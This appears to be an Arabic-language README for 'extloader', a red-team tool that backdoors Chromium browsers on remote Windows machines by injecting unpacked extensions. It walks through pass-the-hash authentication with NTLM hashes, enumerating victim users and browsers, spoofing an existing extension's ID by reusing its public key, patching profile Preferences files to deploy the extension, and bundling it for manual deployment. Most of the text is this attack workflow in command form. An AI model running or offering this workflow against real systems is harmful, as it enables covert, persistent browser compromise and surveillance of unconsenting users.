
مجموعة أدوات لاستغلال إضافات Chromium
مجموعة أدوات صغيرة لإدارة ونشر إضافات Chromium غير المعبأة.
اكتشف المزيد في التدوينة التالية: https://www.synacktiv.com/en/publications/the-phantom-extension-backdooring-chrome-through-uncharted-pathways
pipx install .
extloader --help
استخدم
pipxللتثبيت المعزول الذي يستهدف Python 3.10+.
uv venv
source .venv/bin/activate
uv pip install -e .
-p/--password-H/--hash (صيغة LM:NT أو NT فقط)-d/--domain (الافتراضي WORKGROUP)-t, --target: IP/اسم المضيف الهدف-u, --username: اسم المستخدم-i, --index: فهرس المستخدم من أمر check--debug: تفعيل تسجيل التصحيحفيما يلي مثال خطوة بخطوة لنشر إضافة:
# This will list available users and browsers
extloader check -t 192.168.1.100 -u admin -H aad3b435b51404eeaad3b435b51404ee:ntlm_hash -d corp.local
┏━━━━━━━━┳━━━━━━━━━━━━━━━━━┳━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┓
┃ Index ┃ Browser ┃ User (SID) ┃
┡━━━━━━━━╇━━━━━━━━━━━━━━━━━╇━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━┩
│ 1 │ Chrome │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122) │
│ 2 │ Microsoft Edge │ john.doe (S-1-5-21-4196007090-2879228606-3183820935-1122) │
└────────┴─────────────────┴──────────────────────────────────────────────────────────────┘
عندما تشغّل الاستغلال على جهاز مختلف، قم دائمًا بتشغيل الأمر
checkأولاً لتحديث السياق (available_targets.json).
# Create a deterministic crx_id by adding a key to the manifest.json
extloader sign --extension ./my-extension
لانتحال هوية معرف إضافة موجودة، تجاوز الأمر أعلاه واضبط مفتاح
keyفي manifest على المفتاح العام base64 للإضافة التي تحاكيها. إعادة استخدام هذا المفتاح تُبقي معرف CRX دون تغيير.
# Deploy to user index 1 (Chrome of john.doe)
extloader exploit -t 192.168.1.100 -u admin -H ntlm_hash -i 1 --extension ./my-extension
4.(بديل) أنشئ حزمة للنشر اليدوي:
# Bundle the signed extension with the captured Preferences file
extloader package --prefs-file "Preferences" --extension-dir ./my-extension --target-dir "C:\\Users\\Public"
# This creates a ZIP containing:
# - Signed extension files
# - Updated preferences files
# - Deployment instructions
--prefs-fileيتوقع ملف تفضيلات ملف تعريف المتصفح الذي قمت بنسخه احتياطيًا (يخزّنها Chrome/Edge بصيغةSecure Preferences، بينما تستخدم متصفحات Chromium الأخرىPreferences). يقوم المحمّل بنسخها، وتصحيحها، ويضمّن النسختين المعدّلة وغير المعدّلة في الحزمة.
├── extension/
│ └── chrome-mv3/
├── preferences/
│ ├── brave/
│ ├── chrome/
│ ├── chromium/
[...]
└── info.json
# Restore original preferences for user index 1 (need check command to get the correct context)
extloader restore -t 192.168.1.100 -u admin -H ntlm_hash -i 1 -f ./backup_preferences
package مع Linuxpackage مع macOS